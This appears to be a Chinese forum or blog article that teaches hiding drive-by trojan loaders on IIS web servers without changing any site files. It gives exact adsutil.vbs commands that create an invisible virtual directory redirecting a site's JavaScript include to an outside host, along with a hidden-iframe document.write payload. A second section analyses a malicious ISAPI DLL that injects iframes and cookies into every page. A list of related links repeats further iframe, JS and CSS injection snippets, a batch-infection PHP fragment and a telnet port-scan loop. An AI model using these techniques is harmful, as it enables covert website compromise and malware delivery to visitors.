最新的无权限挂马方式

还有在国外的一些机器上,什么权限都拿到了也不知道他怎么弄的,什么都不让写,好不容易写个文件没一会又改回去了,真的让人很!#$%%#%^#%^,据说就有一种软件能监视重要的文件,一旦发现更改就会给恢复过去,譬如他监视web目录的话我们就不能更改他网站的任何内容了。不过,看了很多大虾的文章,自己也略微研究了下,也总算琢磨点东西出来,不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果,这里就给大家介绍下,那些只知道勤快的管理员也要小心了!

大家知道,我们浏览网站的时候都是服务器将信息处理成Html方式再返回给我们,而我们要实现的是当客户访问的时候能改变他们浏览器的内容,使他隐蔽的执行我们的东西如木马等等。比较常见的方式就是引入Frame,设置属性让他在页面不可见,或者不怕死的用javascript跳转,比较高级点的会利用原代码里的Html元素如script标记或者frame标记,然后在这些标记里引入的其他文件或者页面里做手脚,或者更改某些要在主页上显示的数据库内容,如修改数据库里的公告实现挂马。但是这些都需要在服务器的原代码里加东西或者修改网站的内容,无论是跨站还是直接修改原代码,这都是极其容易被发现的事,遇到一个勤快的管理员,你的东西就在服务器上呆不了多久了!还有就是如果一些页面是不可写的我们也很郁闷,所以有必要寻找一种更隐蔽和更安全的挂马方式解决上面的问题!

我们首先去Iis管理器里看看吧!选中一个页面看看他的属性如图一。呵呵,有个资源重定向吧!如果我们将这个页面选择重定向到我们已经控制的一个页面那么当浏览器请求这个页面的时候将会转而去访问我们定义好的那个页面,如果这个页面是网页木马呢?很显然,访问者就会被挂马!这是很简单的方式,只需要在 IIs里更改页面的重定向就可以了!任何能接触到IIS管理器的人都能轻易做到!但是这样还有问题啊!如果管理员发现页面总被跳转,在检查网站的文件以及用备份等手段恢复还是没有解决问题的时候,他肯定会去IIS里看!一不小心看到主页面的属性就会发现哪里存在问题然后就可以改回去了!

那么我们继续看看有没有更隐藏的方法!借助以前挂马者的方法,既然主页面很容易被发现,那么去看看主页面里的Html标记吧!如果发现有调用其他的页面就好办了!譬如里面主页里有这样的一个标记:

<script src=include/mm2.js></script>

那么我们就有办法了,去修改include/mms2.js的属性吧!如图二,转到我们的某个页面,内容当然要能在script标记里解释的了,如:

document.write("<8))e style=display:none; src=http://jnclovesw.com width=0 height=0></8))e>");

这样就可以引入我们的页面了!当然最好还是先实现他JS的功能!那样才够隐蔽!现在管理员会发现首页没有更改,去IIs 里看首页的属性也没有更改,甚至主机上的任何www文件都没有修改,他会很郁闷吧!呵呵!如果他只是把以前的网站备份恢复回去也是没有办法把页面改回去的!IIs文件那么多他总不能一个一个看属性吧!这里顺便提个问题,就是你选择重定向过去的文件必须是能被引用他的html标记能解释的,否则是没有效果的!譬如一个<img src=1.jpg>你把1.jpg重定向到我们的木马页面是没有用的,因为木马页面没有被当成Html解析,而是送到img标签里当成图片了!我想到的能利用的标记也就是script还有frame,至于Css,我想也是能利用的,但是利用方法我还没有找到!也不知道我分析得对不对,欢迎大家指教啊!
让我们继续吧!假设万一你的管理员够厉害或者够勤快,他发现了你在mm2.js上面做了手脚,他就会从IIs里面把他恢复过去!我们的梦想又破灭了!有没有更隐蔽的方法呢?让管理员在IIs里面都找不到呢?答案是肯定的!大家一定记得很久前的那个IIS配置漏洞,可以建立一个看不见的虚拟目录,然后在里面建立后门!我们也可以借来利用哦!看看IIS配置漏洞的原理是说建立一个没有物理目录的虚拟目录,这样就会在IIs里不可见,然后就可以在这个目录里做些小动作了!这里我们先建立一个不可见的虚拟目录,如果主页里调用了include文件夹下的js文件,我们就建立include目录吧!这可以借助IIS 的脚本实现,其中adsutil.vbs脚本是在IIs的安装目录如C:InetpubAdminScripts下的,是控制IIS行为的一个脚本,我们用到的命令如下:

cscript adsutil.vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"

这样就会建立了个IIs里不可见的虚拟目录,因为没有设置路径所以不会显示哦!然后再在这个目录下建立一个名字叫做mm2.js的虚拟目录,呵呵!居然建立虚拟目录是可以用到.等特殊字符的:

cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"

这样就存在一个include/mm2.js的虚拟目录了!想到什么了?是不是跟主页里调用的那个文件名字一直的哦!我们继续往下做!

cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.js"

这样是更改mm2.js虚拟目录的重定向特性,如图三。注意其中的W3SVC/1/Root/www/代表IIs下的第一个web服务器的www虚拟目录,大家不清楚的话可以用adsutil.vbs的enum参数去查询自己需要更改的网站,其他的操作可以打开 adsutil.vbs脚本的帮助看看!这样操作之后就设置了虚拟目录的重定向特性,现在试着在主页里调用include/mm2.js,你猜猜返回的是 mm2.js的内容还是我们的mm1.js的内容呢?答案是mm1.js,如图四,并且物理文件还是存在的!这也许是IIS的特性吧!他首先处理用户的请求,并且虚拟目录优先于物理文件!然后我们去IIS里看看有不有include虚拟目录吧!如图五,没有吧!呵呵!这样我们就成功的饶过权限的限制和管理员的检测!将我们的木马挂到了对方的网站上,并且除非对方重做IIs或者删除我们隐藏的虚拟目录,否则他是很难清除我们的木马的!

文章很简单,关键是IIS脚本的命令和对IIs的一些认识,这种挂马方式适合于得到管理员权限之后挂马,对付那些只是勤快的管理员还是很有用的!大家以后发现网站存在问题记得要用这个脚本查看下有不有问题哦!或者干脆把IIS的设置也备份吧!遇到问题把IIs的设置也还原,呵呵!

2.全服务器被挂马 网页源文件中却找不到挂马代码
一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了

<8))e src="http://xxxdfsfd/web.htm" height=0 width=0></8))e>

这种样式的代码 一般在头部 部分杀毒软件打开会报毒

打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码

起初会怀疑是JS 找了半天还是没有发现 连新建的HTML页面 也会有这段代码~

仔细寻找 问题应该在IIS上 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的

路径为:c:windowshelpwanps.dll ISAP加载正常 绿色状态

取消 重新启动IIS 所有代码消失

加载项包含了三个文件:

wanps.ini内容为:

Cookie=GAG5=ABCDEFG
Redirector=C:windowshelpwanps.txt

wanps.txt内容为:

<body>
<8))e src="http://xxx.com/web.htm" height=0 width=0></8))e>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>

(0)

相关推荐

  • 网页挂马方式整理及详细介绍

    网页挂马方式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe>  二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script>

  • 挂马代码 网页挂马分析

    如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的.如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中.     网马危害     如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很

  • 利用css实现挂马的代码

    body {  background-image: url('javascript:document.write("<script src=http://www.jb51.net/9xiao.js></script>")') } 9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")

  • Asp常见挂马方式大总结

    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="J

  • 阻止网页挂马的若干工具小集合

    那么,除了在Web开发的时候注意以外,有什么有效的工具可以对抗SQL注入攻击? 今天,微软和惠普的安全部门合作发布了三个工具,分别是: 微软SQL注入攻击源码扫描器:Microsoft Source Code Analyzer for SQL Injection (MSCASI).这个工具给网站开发人员使用.是一个静态扫描ASP代码的工具,可以查找发现第一类和第二类的SQL注入攻击漏洞.工具下载地址: http://support.microsoft.com/kb/954476 惠普的 Scra

  • php下批量挂马和批量清马代码

    复制代码 代码如下: <?php function gmfun($path=".") { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == "." || $v == "..") continue; $file = $d->path."/".$v; if(@is_dir($file)) { gmfun($file); } else {

  • 最新病毒之SXS病毒专杀方式,最近挂马严重

    [%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]%]  [%_repeat_0%] SXS.EXE这是一个盗取QQ帐号密码的木马病毒,特点是可以通过可移动磁盘传播.该病毒的主要危害是盗取QQ帐户和密码:该病毒还会结束大量反病毒软件,降低系统的安全等级.  中毒症状:电脑分区双击不能自动打开或者很难打开,用右键打开可以!这是最显见的症状!  解决方式:网上已经有很多手动删除的方式!  现在有

  • js cookies 常见网页木马挂马代码 24小时只加载一次

    复制代码 代码如下: <div style='display:none'> <script type="text/javascript"> function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1

  • 预防网页挂马的方法总结

    预防网页挂马的方法总结: 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭

  • dos之for命令实现扫描网段的端口,用于辅助解决ARP挂马

    不需要任何工具,dos命令扫描一个网段的全部端口!  在win2000下开一个dos窗口,然后执行  for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389  这样192.168.0.x这个段的所有开放3389端口得主机都会暴露  这条命令执行后  会在任务栏开254个小窗口  然后telnet链接失败的窗口会在大约5秒后自动退出  剩下的窗口就是相对应开放端口的主机了  看一下小窗口的标题可以得知主机的ip地址  如

  • 数据库中的内容字段被挂马的替换方法 SQL注入

    清除了sqlsever中的一些挂马字段,现在总结sqlsever批量替换数据库挂马字段一文,希望可以帮助有需要的人. [处理方法] 1.先备份数据,防止删除挂马字段的时候,丢失数据: 2.对挂马的表中的字段text小于8000执行以下语句(网上的很多软件与方法都是针对text小于8000的,这个解决方法你可以参考) 代码如下: 如表news 字段context 挂马字段是 <Script Src=http://c.n%75clear3.com/css/c.js></Script>

随机推荐